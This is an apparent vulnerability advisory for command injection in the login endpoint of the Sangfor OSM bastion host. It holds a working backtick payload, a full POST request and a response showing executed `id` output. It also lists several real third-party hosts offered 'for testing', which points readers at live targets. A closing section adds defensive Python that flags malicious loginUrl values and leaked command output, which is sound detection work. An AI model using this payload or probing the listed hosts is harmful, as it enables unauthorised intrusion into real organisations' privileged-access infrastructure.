CTF | 1 minute
Command Execute in Sangfor OSM
October 20, 2025
SangFor OSM

Title: Command Execute in Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

BUG_Author: Tajang

Affected Version: Sangfor Operation and Maintenance Security Management System (Bastion Host) ≥ 3.0

Vendor: SangFor OSM

Software: SangFor OSM

Vulnerability Files:

  • fort/portal_login

Description:

  1. Execute commands on the frontend:

    • The vulnerability exists in the system’s fort/portal_login endpoint.
  2. Exploiting the Command Execution:

    • The loginUrl field in the frontend login request can execute system commands.
  3. Example Command Injection Payload:

    • The following payload can be used to execute system commands:
      "{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #
  4. Front-end Command Execution Point:

    • Send a POST request to this URL, with the Content-Type set to JSON format and the body containing the payload above:

      http://<target-ip>/fort/portal_login
  5. Verifying the Exploit:

    • If the command execution is successful, the attacker will see the command echo in the response body of the returned packet.

Proof of Concept:

  1. Access the login page of the vulnerable application:

    https://111.31.77.177:4443/fort/portal_login
  2. The complete POST packet:

    POST /fort/portal_login HTTP/1.1
    Host: 111.31.77.177:4443
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
    Cookie: 
    Content-Type: application/json; charset=utf-8

    "{\"userName\":\"Bob\", \"loginUrl\":\"`id`\", \"role\": \"\",\"password\": \"123456789\"}" #
  3. If successful, you should see the following content in the response body:

    {
      "redirectUrl": "uid=1005(webuser) gid=1006(webuser) groups=1006(webuser),65534(nogroup)",
      "message": "role为空",
      "isSuccess": false
    }

  4. I provided some addresses for testing:

    • https://blj.dongyuansh.com:4430/fort/portal_login
    • https://61.171.81.50:44331/fort/portal_login
    • https://xxb.cqfsk.com/fort/portal_login
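The request and response above give a defender two things to check: a loginUrl that is not an absolute URL (the payload above is a JSON string wrapped in a second JSON string, followed by ` #`), and a redirectUrl in the reply that carries shell output instead of a URL. The following is an added example, not code from the advisory or the vendor; the log record format (JSON lines with `path` and `body` fields) and the sample records are constructed for illustration.

```python
import json
import re
from urllib.parse import urlparse

# Shell metacharacters that never belong in a redirect URL (the payload relies on backticks),
# plus a conservative allowlist for the URL as a whole.
SHELL_META = re.compile(r'[`$;|<>\\"\'\n\r]')
URL_CHARS = re.compile(r"[A-Za-z0-9._~:/?#=&%+-]+")

def is_safe_login_url(value) -> bool:
    """Allowlist check: an absolute http(s) URL made only of URL characters."""
    if not isinstance(value, str) or SHELL_META.search(value):
        return False
    parsed = urlparse(value)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc) \
        and URL_CHARS.fullmatch(value) is not None

def extract_login_url(body: str):
    """loginUrl from a portal_login body, or None. The payload is a JSON string that
    itself contains JSON, followed by ' #': raw_decode the first value, then decode again."""
    try:
        value, _ = json.JSONDecoder().raw_decode(body.strip())
        if isinstance(value, str):
            value = json.loads(value)
    except json.JSONDecodeError:
        return None
    return value.get("loginUrl") if isinstance(value, dict) else None

def scan_requests(log_lines):
    """(line_no, loginUrl) for each portal_login request whose loginUrl fails the allowlist."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        rec = json.loads(line)  # constructed record format: {"path": ..., "body": ...}
        if rec.get("path") == "/fort/portal_login":
            url = extract_login_url(rec.get("body", ""))
            if url is not None and not is_safe_login_url(url):
                hits.append((n, url))
    return hits

def response_leaks_output(response_body: str) -> bool:
    """True when redirectUrl is not a URL at all, as with the 'id' output in the advisory."""
    redirect = json.loads(response_body).get("redirectUrl")
    return redirect is not None and not is_safe_login_url(redirect)

# Constructed sample records: one ordinary login, one carrying the advisory's payload.
SAMPLE_LOG = [
    json.dumps({"path": "/fort/portal_login",
                "body": '{"userName":"alice","loginUrl":"https://portal.example.test/home","role":"admin","password":"x"}'}),
    json.dumps({"path": "/fort/portal_login",
                "body": '"{\\"userName\\":\\"Bob\\", \\"loginUrl\\":\\"`id`\\", \\"role\\": \\"\\",\\"password\\": \\"123456789\\"}" #'}),
]
```

`scan_requests(SAMPLE_LOG)` flags only the second record, and `response_leaks_output` applied to the response shown in the Proof of Concept returns True because its redirectUrl is the output of `id` rather than a URL.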